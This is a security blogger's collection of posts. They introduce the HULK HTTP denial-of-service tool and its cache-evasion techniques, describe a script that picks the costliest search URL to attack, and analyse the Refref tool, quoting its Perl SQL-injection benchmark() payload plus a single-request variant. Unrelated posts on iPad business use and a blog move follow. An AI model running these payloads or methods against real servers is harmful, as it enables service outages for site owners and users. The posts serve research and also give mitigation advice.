HULK, Web Server DoS Tool

Introducing HULK (HTTP Unbearable Load King).

In my line of work, I get to see tons of nifty hacking and traffic-generation tools, meant either to break into a system and steal information, or to exhaust its resource pool, rendering the service dead and putting the system under a denial of service.

For a while now, I have been playing with some of the more exotic tools, and found that their main problem is always the same: they create repeatable patterns, making it too easy to predict the next request and therefore mitigate it. Others, although elegant, lack the horsepower to really bring a system to its knees.

For research purposes, I decided to take some of the lessons I’ve learned over time and practice what I preach.

Harnessing Python, I wrote a script that generates nicely crafted, unique HTTP requests one after the other, putting a fair load on a web server and eventually exhausting it of resources. This can be optimized much, much further, but as a proof of concept and generic guidance it does its job.

As a guideline, the main concept of HULK is to make each and every generated request unique, thus avoiding/bypassing caching engines and hitting the server's load directly.

I have published it to Packet Storm, as we do.

Some Techniques

  • Obfuscation of Source Client – done by keeping a list of known User-Agents; for every request that is constructed, the User-Agent is a random value out of the known list.
  • Reference Forgery – the referer that accompanies the request is obfuscated and points either at the host itself or at some major pre-listed websites.
  • Stickiness – using standard HTTP headers to ask the server to maintain open connections, via Keep-Alive with a variable time window.
  • no-cache – this is a given, but by asking for no-cache, a server that is not behind a dedicated caching service will compute a unique page for each request.
  • Unique Transformation of URL – to eliminate caching and other optimization tools, custom parameter names and values are randomized and attached to each request, rendering it unique and forcing the server to process the response on each event.
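The techniques above can be sketched in a few lines of Python. This is a minimal illustration of the ideas, not HULK's actual source: the User-Agent and referer lists are shortened stand-ins, and `build_request` is a hypothetical helper name.

```python
import random
import string

# Shortened stand-in lists; a real tool would ship much longer ones.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1",
    "Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20120403",
]
REFERERS = ["http://www.google.com/?q=", "http://www.bing.com/search?q="]

def rand_token(size):
    """Random alphanumeric string for parameter names and values."""
    return "".join(random.choice(string.ascii_lowercase + string.digits)
                   for _ in range(size))

def build_request(url):
    """Build one unique request: random UA, forged referer, keep-alive,
    no-cache, and a never-repeating query string."""
    headers = {
        "User-Agent": random.choice(USER_AGENTS),           # source obfuscation
        "Referer": random.choice(REFERERS) + rand_token(8),  # reference forgery
        "Connection": "keep-alive",                          # stickiness
        "Keep-Alive": str(random.randint(110, 120)),         # variable time window
        "Cache-Control": "no-cache",                         # bypass caches
    }
    # Unique transformation of URL: random parameter name and value.
    unique_url = "%s?%s=%s" % (url, rand_token(5), rand_token(9))
    return unique_url, headers
```

Every call produces a different URL and header set, which is exactly what defeats caches and naive pattern-based filtering.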


Basically, my test web server with 4 GB of RAM running Microsoft IIS7 was brought to its knees in under a minute, with all requests coming from a single host.

In the pictures below you can see the tool in action: first ( #1 ) it is executed against a URL and starts generating a load of unique requests, sending them to the target server ( the host of the URL ); second ( #2 ) we can see that at some point the server starts failing to respond, having exhausted its resource pool.


Note that the “safe” word is meant to kill the process after all threads get a 500 error; it’s easier to control in a lab, and it is optional.


File : ( via Packetstorm )

The tool is meant for educational purposes only, and should not be used for malicious activity of any kind.


[ Edit 25nov2012 : changed download link to packetstorm ]

Finding the best Web DoS Attack Url


To establish common ground, I would like to start by explaining some theory behind DoS attacks on the HTTP attack vector.

An HTTP DoS attack is usually not based on a vulnerability or known flaw in a web server or service; instead, it is an attempt to bring a server down by consuming all of its available resources and its service pool. That being said, common HTTP DoS tools usually operate by generating massive amounts of requests to a specific set of URLs on a website in order to choke the resource pool, denying the service.
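Stripped to its essence, that mechanic is just many concurrent requests aimed at the same URL. A minimal sketch, with `fetch` as a stand-in for whatever HTTP client a real tool would use:

```python
import threading

def flood(url, fetch, threads=4, requests_per_thread=100):
    """Fire many concurrent requests at one URL: the basic mechanic
    behind most HTTP DoS tools."""
    def worker():
        for _ in range(requests_per_thread):
            fetch(url)

    pool = [threading.Thread(target=worker) for _ in range(threads)]
    for t in pool:
        t.start()
    for t in pool:
        t.join()
```

Injecting `fetch` keeps the sketch lab-safe: you can point it at a counter instead of a live server.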

One very important element in the process is locating the “Perfect URL” – the URL that causes the most load on the server when requested, requiring the server to process as much data as possible before presenting the output to the client. Because of that, the best vector is usually the website’s search engine, since a search will always require some computation power.


What I came to realize is that a simple engine can be written to run a dictionary against a search engine; by observing the number of results the website returns for each keyword, an automated tool can determine which search term creates the most load on the server, and build the DoS URL based on that.

Ready, Get Set,  Go!

Let’s break the idea into what we want to achieve: we want to send multiple requests to a web server’s search URL, running a dictionary as the search term, and by parsing the response page for the place where the number of results is returned, find the phrase that returns the most results (max) and crown it as the “Perfect URL” for a DoS attack.

Using Python, I wrote such a tool. It takes as input a search URL, a regex for finding the number of results, and a dictionary file, and does what I described above ( multithreaded, of course ).

Usage looks something like :

python 'results\s\:\s(\d+)' wordlist.txt

The tool then opens several threads, each taking a word out of the dictionary and adding it to the search string. It then looks for the regular expression in the result page and grabs the number of results. Finally, it outputs the best URL so far – the one that produced the highest number of results.
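The core loop can be sketched as follows, leaving threading out for clarity. This is an illustrative reconstruction, not the published tool: `fetch` stands in for the HTTP client, and the regex is whatever matches the target site's results counter (first capture group).

```python
import re
import urllib.parse
import urllib.request

def count_results(search_url, word, pattern, fetch=None):
    """GET search_url with `word` appended and extract the result
    count via the user-supplied regex (first capture group)."""
    url = search_url + urllib.parse.quote(word)
    if fetch is None:  # default: plain stdlib HTTP GET
        fetch = lambda u: urllib.request.urlopen(u).read().decode()
    match = re.search(pattern, fetch(url))
    return int(match.group(1)) if match else 0

def best_dos_url(search_url, pattern, words, fetch=None):
    """Crown the word producing the most results as the 'Perfect URL'."""
    best_word, best_count = None, -1
    for word in words:
        count = count_results(search_url, word, pattern, fetch)
        print("WORD:%s COUNT:%d URL:%s" % (word, count, search_url + word))
        if count > best_count:
            best_word, best_count = word, count
    return search_url + urllib.parse.quote(best_word), best_count
```

Running it against the example output shown below, "man" wins with the highest count and its search URL becomes the attack candidate.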

Looks something like this :

python 'results\s\:\s(\d+)' dictionary.txt
-- Loading Dictionary --
-- Loading Complete --
WORD:tree COUNT:13454 URL:
WORD:woman COUNT:110565 URL:
WORD:man COUNT:203721 URL:

As you can see, the results indicate that the word “man” produced the most search results ( 203721 ), and therefore the best URL to run an HTTP DoS attack against this site will be 

In a DoS attack scheme, this kind of tool will/should be used as part of the Reconnaissance phase, detecting a good attack URL ( or URLs ) and then running a DoS tool against it.


I am sharing this as an educational tool, designed to be used only in a lab environment and not in the wild. It is meant for research purposes only, and any malicious usage of this tool is prohibited.

File : ( zip file )

Looking into Refref

I finally had some time to play around with Refref ( originally written for Anonymous ), and I really liked it. For those of you who are unfamiliar with Refref, it is an application denial-of-service tool which uses an interesting attack vector, making it very effective. To my knowledge it exists in the wild as either a Perl script or a JavaScript flavor.

The interesting thing about the JavaScript flavor is that it can run off simple devices such as smartphones or tablets, making it more effective for the ease of getting a hacktivist on board without running Perl or downloading software.


The way Refref works is by exploiting an SQLi in the front-end web server: it injects an SQL command that hits an unprotected database server and exhausts its resources. As far as I know it affects only MySQL servers; however, they seem to be the majority of back-end DB servers for many of today’s websites, at least as the most upfront database tier.

The SQL command in use is MySQL’s benchmark() function, which evaluates an expression a given number of times. Normally the database user that the application server runs as should not be allowed to execute that command, but in many, many cases it remains unhandled and is in fact a vulnerability.

The payload code snippet out of (source can be found here) :

sub now {
  print "\n[+] Target : " . $_[0] . "\n";
  print "\n[+] Starting the attack\n[+] Info: Control+C to stop attack\n\n";

  while(true) {
    $SIG{INT} = \&adios;

    $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");

    unless($code->is_success) {
      print "[+] Web Off\n";
    }
  }
}
Looking at the payload, we can easily identify the injected function: benchmark(), evaluating the hex term presented 99999999999 times. Converting hex to ASCII renders the term 0x70726f62616e646f70726f62616e646f70726f62616e646f as “probandoprobandoprobando”, which translates to “testingtestingtesting” in English.
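The decoding step is easy to verify yourself, for example in Python:

```python
# Decode the injected hex literal back to its ASCII form.
# 0x70726f62616e646f is "probando", repeated three times in the payload.
payload_hex = "70726f62616e646f" * 3
decoded = bytes.fromhex(payload_hex).decode("ascii")
print(decoded)  # probandoprobandoprobando
```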

The CPU time required to evaluate the function is what generates the denial of service on the MySQL server. When I tested this on MySQL ( latest community version available today ), it brought my server to its knees in 2-3 seconds, pushing CPU utilization to 99-100% and effectively denying it from serving any information to clients. Very, very effective.

My Take

Although Refref in its current form is quite effective, the payload implementation works the way old DoS tools usually work: knocking on the door until it breaks. I am uncertain that this is necessary in an application DoS attack, since Refref is based on deploying a command to the server and making it busy.

I therefore have altered the payload function to the following form and ran the test again :

sub now {
  print "\n[+] Target : ".$_[0]."\n";
  print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
  $SIG{INT} = \&adios;
  $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
  print "[+] Web Off\n";
}

All I did here is take the loop out, turning it into a single-request attack.

The result was the same: the server hit 99-100% utilization evaluating the request. I guess the reason for the original loop is to add an ordinary traffic jam on top of the payload, but used my way, you get a nice drive-by attack, killing the service with just a single request. My guess is that when the author wrote the original tool, he/she/they had either a different experience or a larger environment where the loop mattered.


  • (Frontend) My take is that a Web Application Firewall should be able to handle this tool using standard SQL injection mitigation techniques, since the attack vector is in fact SQLi used to inject the function payload.
  • (Backend) I would suggest hardening the database by not allowing non-DBA users to run the benchmark function, and also hardening the user configured on the web front end so it cannot run any database function that is not necessary for its operation.

The new iPad as a Business Tool

I decided to stop carrying my laptop to business meetings. No use. I got to the point where I felt I was carrying a bulky bag full of unneeded cables, adapters and other gear, when the only time I need it is when my clients require my hands-on expertise.

Today, with the purchase of the new iPad ( 3rd generation ), I am completely moving away from carrying a laptop, and this is how I am going to fulfill my business needs on the go:

  1. Back-office email/calendar/notes are all handled by the native software anyway, so that’s a fairly easy task.
  2. Dropbox holds all documents that I sometimes send clients or need to answer a question, and I can access it from the iPad.
  3. I take notes in meetings using Evernote, and then use the desktop client to view them when I’m at my desk working on my PC.
  4. Presentations are completely solved using the SlideShark application, which converts PPT/PPTX to its own format and gives me the exact same presentation quality and animation as PowerPoint ( I use Apple’s VGA adapter to present ).
  5. GoodReader is my file orchestrator; it connects everywhere! To my company FTP, to my Dropbox, to my Google Docs, and to my shares when available. I use it to read documents from all sources, keep local copies if needed, and to trigger external readers ( the “Open In…” feature is how I open slides in SlideShark ).

There is probably more, but for now, that’s my solution to day-to-day business computing on the go, without carrying the bulk.

My Old Blog

Today, I’m making the move, after using Blogger for years as my blog host.

I don’t know exactly why I moved; I just wanted a WordPress blog that I can use going forward, to mark a new path in the way I blog, get back into focus and have a clearer mind.

I decided not to migrate the majority of old posts, maybe just some key ones, and just let the old blog gather dust. If you want to read some of my old content, please visit

To make it easier for existing subscribers, the RSS Feeds now direct to the new site.

All future writing and publishing, will be here.